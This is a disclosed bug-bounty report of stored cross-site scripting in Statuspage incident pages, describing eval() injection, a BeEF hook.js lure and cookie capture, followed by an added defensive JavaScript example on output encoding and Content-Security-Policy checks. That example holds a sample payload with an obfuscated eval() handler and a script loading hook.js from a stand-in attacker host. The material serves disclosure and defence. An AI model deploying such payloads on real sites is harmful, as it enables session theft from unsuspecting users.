Application is vulnerable to stored XSS

Disclosed by
PuneetLucknowi
  • Engagement Statuspage
  • Disclosed date over 1 year ago
  • Points 5
  • Priority P5 (Bugcrowd's VRT priority rating)
  • Status Informational (this vulnerability is seen as an accepted business risk)
Summary by Statuspage

Stored XSS Vulnerability in Statuspage

Summary by PuneetLucknowi

Please share full details; it would be helpful for the development team to understand the issue.

Report details
  • Submitted

  • Target Location

    *.statuspage.io
  • Target category

    Web App

  • VRT

    Cross-Site Scripting (XSS) > Stored
  • Priority

    P5
  • Bug URL
    https://jokery.statuspage.io/incidents/r033ggcvdnvt?utm_source=manage
  • Description

    Title:

    Application is vulnerable to stored XSS.

    Vulnerability reproduction steps

    A user can create a web application and use HTML embedding to build a site. Plain HTML is acceptable there, but dangerous JavaScript functions such as eval() are also accepted as input.

    An attacker could create a site application with an injected malicious eval() function and use a tool such as the BeEF exploitation framework to run a malicious JavaScript payload in the victim's browser, crafting various exploits from there.

    The attacker creates a single page whose JavaScript eval() function includes malicious JavaScript such as hook.js, then advertises the page. Because the page is served under the primary domain/FQDN *.statuspage.io, victims readily trust it. On viewing the page, the malicious JavaScript reference included through eval() serves the payload to the victim, enabling various XSS-based attacks through the BeEF exploitation framework. A detailed example of exploitation with the BeEF framework is referenced below:

    https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting
    https://zsecurity.org/how-to-use-beef-framework-over-wan/
    https://www.kali.org/tools/beef-xss/

    So advertising a single page could lead to the exploitation of multiple users/victims.

    Remediation:

    Please refer below link for remediation:

    https://portswigger.net/web-security/cross-site-scripting/preventing

    Steps:

    1. Injected XSS script (eval() function) returned in the response:
      xsser1.JPG

    2. XSS payload executed, and various data captured in the XSS Hunter framework: the victim's cookie, IP address, etc.

    xsser2.JPG

    xsser3.JPG

    Recommendation: It is recommended to block execution of dangerous functions such as eval() as well.
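The two controls the report's remediation link points at are output encoding of user-supplied markup and a Content-Security-Policy that forbids inline script and eval(). The following is an added example written for this page; it is not code from the report, from Statuspage, or from Bugcrowd. It shows a vulnerable render of an incident body beside a hardened one, and a small CSP parser that checks whether a policy would still let an injected inline script or eval() call run. All function names, the payload, and the hostnames (`static.example.com`, `attacker.example`) are constructed for illustration and do not describe Statuspage's implementation.

```javascript
// Added example: vulnerable vs. hardened rendering of user-supplied incident
// HTML, plus a Content-Security-Policy check. Names, payload and hostnames
// are constructed for illustration, not taken from the target application.

// Context-aware encoding for the HTML body context (OWASP/PortSwigger-style
// entity encoding of the characters that can open markup or attributes).
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(s).replace(/[&<>"'/]/g, (c) => map[c]);
}

// VULNERABLE: untrusted HTML is concatenated straight into the page, so any
// <script>, event handler or eval() call the submitter included executes in
// every viewer's browser under the trusted origin.
function renderIncidentUnsafe(title, body) {
  return `<article><h1>${title}</h1><div class="body">${body}</div></article>`;
}

// HARDENED: the same fields are output-encoded, so the payload is displayed
// as text rather than parsed as markup.
function renderIncidentSafe(title, body) {
  return `<article><h1>${escapeHtml(title)}</h1><div class="body">${escapeHtml(body)}</div></article>`;
}

// Parse a Content-Security-Policy header into { directive: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return policy;
}

// Would this policy let an injected inline <script>, an inline event handler
// or an eval() call run? script-src governs scripts; default-src is the
// fallback when script-src is absent; no directive at all means no restriction.
function cspAllowsInjectedScript(header) {
  const policy = parseCsp(header);
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true;
  const weak = new Set(["'unsafe-inline'", "'unsafe-eval'", '*', 'data:']);
  return sources.some((src) => weak.has(src));
}

// A policy that blocks inline handlers, inline <script> and eval() even if
// some markup slips past the encoder. The static host is an assumption.
const HARDENED_CSP =
  "default-src 'self'; script-src 'self' https://static.example.com; object-src 'none'; base-uri 'none'";
// A policy that looks restrictive but re-enables exactly what the report abuses.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'";

// Constructed payload of the kind the report describes: an inline handler
// calling eval() (the base64 decodes to alert(1)) and a remote hook script.
const PAYLOAD =
  `<img src=x onerror="eval(atob('YWxlcnQoMSk='))"><script src="https://attacker.example/hook.js"></script>`;

// Does rendered output still contain the payload's tags as live markup?
function hasRawPayloadTag(html) {
  return /<(script|img)\b/i.test(html);
}

console.log('unsafe render keeps live tags:', hasRawPayloadTag(renderIncidentUnsafe('Outage', PAYLOAD)));
console.log('safe render keeps live tags:  ', hasRawPayloadTag(renderIncidentSafe('Outage', PAYLOAD)));
console.log('weak CSP allows injected script:    ', cspAllowsInjectedScript(WEAK_CSP));
console.log('hardened CSP allows injected script:', cspAllowsInjectedScript(HARDENED_CSP));
```

Encoding alone stops the markup from being parsed; the CSP without `'unsafe-inline'` and `'unsafe-eval'` is the defence-in-depth layer that neutralises an eval() or inline-handler payload if any HTML does get through, which is the control the report's recommendation is asking for. If the product intentionally lets customers embed rich HTML, the encoder should be replaced by an allowlist sanitizer, and the CSP becomes the primary rather than secondary control.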
